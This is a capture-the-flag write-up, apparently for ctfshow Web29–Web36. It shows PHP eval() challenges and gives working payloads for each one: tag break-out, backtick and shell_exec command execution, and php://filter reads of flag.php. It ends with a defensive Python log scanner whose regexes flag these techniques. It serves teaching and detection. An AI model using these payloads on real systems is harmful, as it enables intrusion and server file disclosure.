Web29
<?php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag/i", $c)){
        eval($c);
    }
}else{
    highlight_file(__FILE__);
}
The eval function
Once you understand how eval works (the filter only rejects the substring "flag", everything else is executed as PHP), pass in:
?c=echo "Y2my";?>ctf <?php system('ls');
This reveals the location of the flag.
Because the target is a PHP file, simply running cat flag.php returns nothing useful: the PHP is executed by the server rather than displayed.
So switch to include instead and read the file through the base64 encoding filter, then decode the result.
Pass in:
?c=echo "Y2my"; ?>ctf <?php include($_GET['url']);&url=php://filter/read=convert.base64-encode/resource=flag.php
This yields the flag.
Web30
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 00:42:26
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php/i", $c)){
        eval($c);
    }
}else{
    highlight_file(__FILE__);
}
Compared with Web29, the filter rules are extended.
First pass in:
?c=echo "Y2my "; echo `ls`; ?>
to see where the flag is.
In PHP, backticks `` are the shell execution operator, so on Linux the enclosed text runs as a command.
Of course shell_exec() also works:
?c=echo "Y2my "; echo shell_exec('ls'); ?>
Then pass in:
?c=echo "Y2my "; include($_GET['url']); ?>&url=php://filter/read=convert.base64-encode/resource=flag.php
Base64-decode the output
to get the flag.
Web31
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 00:49:10
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'/i", $c)){
        eval($c);
    }
}else{
    highlight_file(__FILE__);
}
More filtering is added (including the space and the single quote).
First check where the flag is; the space is filtered, so an empty comment /**/ stands in for it:
?c=$y2my=1;echo/**/`ls`;?>
flag.php index.php
Because the single quote ' is now filtered, the previous payload still works
as long as the single quotes are changed to double quotes:
?c=$y2my=1;echo/**/`ls`;include($_GET["url"]);?>&url=php://filter/read=convert.base64-encode/resource=flag.php
flag.php index.php PD9waHANCg0KLyoNCiMgLSotIGNvZGluZzogdXRmLTggLSotDQojIEBBdXRob3I6IGgxeGENCiMgQERhdGU6ICAgMjAyMC0wOS0wNCAwMDo0OToxOQ0KIyBATGFzdCBNb2RpZmllZCBieTogICBoMXhhDQojIEBMYXN0IE1vZGlmaWVkIHRpbWU6IDIwMjAtMDktMDQgMDA6NDk6MjYNCiMgQGVtYWlsOiBoMXhhQGN0ZmVyLmNvbQ0KIyBAbGluazogaHR0cHM6Ly9jdGZlci5jb20NCg0KKi8NCg0KJGZsYWc9ImZsYWd7YWNhMGY4YzEtMGQ3Ny00NTYzLTk0NjMtNDhkZjZmZjMwYWMyfSI7DQo=
Decode the base64 to get the flag.
Web32
After reading the writeup by 羽大佬, I found that include can be used without parentheses,
so the filtered parentheses no longer need to be considered.
The figure below (not reproduced here) lists other functions that can be called without parentheses.
Image credit: a member of the group.
Payload:
?c=$y2my=include$_GET["url"]?>&url=php://filter/read=convert.base64-encode/resource=flag.php
Web33
?c=include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php
Web34
?c=include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php
Same as Web33.
Web35
?c=include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php
Web36
Because digits are now filtered as well, replace the 1 with a letter:
?c=include$_GET[a]?>&a=php://filter/read=convert.base64-encode/resource=flag.php
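As an added example that is not part of the original writeup, here is a defender-side screen for request logs: it URL-decodes every query parameter and flags the techniques the Web29-Web36 payloads rely on (closing the PHP tag to escape eval, backtick execution, dangerous calls, php://filter wrappers, include without parentheses, a superglobal reference, and /**/ standing in for a filtered space). The indicator names, the log format and the sample log lines are constructed for this example.

```python
import re
from urllib.parse import unquote_plus

# Indicator labels are hypothetical names chosen for this example; each regex
# is applied to every URL-decoded parameter value of a request.
INDICATORS = [
    ("php_close_tag", re.compile(r"\?>")),                  # ?> breaks out of eval()
    ("php_open_tag", re.compile(r"<\?php", re.I)),          # raw PHP after the break-out
    ("backtick_exec", re.compile(r"`[^`]+`")),               # `ls` shell execution operator
    ("dangerous_call", re.compile(r"\b(system|shell_exec|exec|passthru|popen)\s*\(", re.I)),
    ("php_wrapper", re.compile(r"php://", re.I)),            # php://filter source disclosure
    ("include_no_parens", re.compile(r"\binclude\s*\$", re.I)),  # include$_GET[...]
    ("superglobal_ref", re.compile(r"\$_(GET|POST|REQUEST)\b")),
    ("comment_as_space", re.compile(r"/\*\*/")),             # /**/ standing in for a space
]

def decode_params(query):
    """Split a raw query string on '&' and URL-decode each name=value pair.
    Split by hand so ';' inside PHP payloads is never treated as a separator."""
    pairs = []
    for part in query.lstrip("?").split("&"):
        if part:
            name, _, value = part.partition("=")
            pairs.append((unquote_plus(name), unquote_plus(value)))
    return pairs

def flag_request(query):
    """Return the sorted indicator labels hit by any parameter value."""
    hits = set()
    for _, value in decode_params(query):
        hits.update(label for label, rx in INDICATORS if rx.search(value))
    return sorted(hits)

# Constructed access-log lines (not from any real server): a benign request and
# one carrying the Web30-style backtick payload, URL-encoded as a browser sends it.
SAMPLE_LOG = [
    '10.0.0.5 - - [04/Sep/2020:00:12:34 +0000] "GET /index.php?page=home&lang=en HTTP/1.1" 200 512',
    '10.0.0.9 - - [04/Sep/2020:00:13:01 +0000] "GET /index.php?c=echo%20%22Y2my%20%22;%20echo%20%60ls%60;%20?%3E HTTP/1.1" 200 88',
]

def scan_log(lines):
    """Return (line, hits) for every GET log line whose query hits an indicator."""
    flagged = []
    for line in lines:
        m = re.search(r'"GET \S*?\?(\S*) ', line)
        if m:
            hits = flag_request(m.group(1))
            if hits:
                flagged.append((line, hits))
    return flagged
```

A single indicator such as php_wrapper is common in legitimate traffic only in rare setups, so alerting on two or more labels per request keeps noise down; the real fix remains never passing request data to eval.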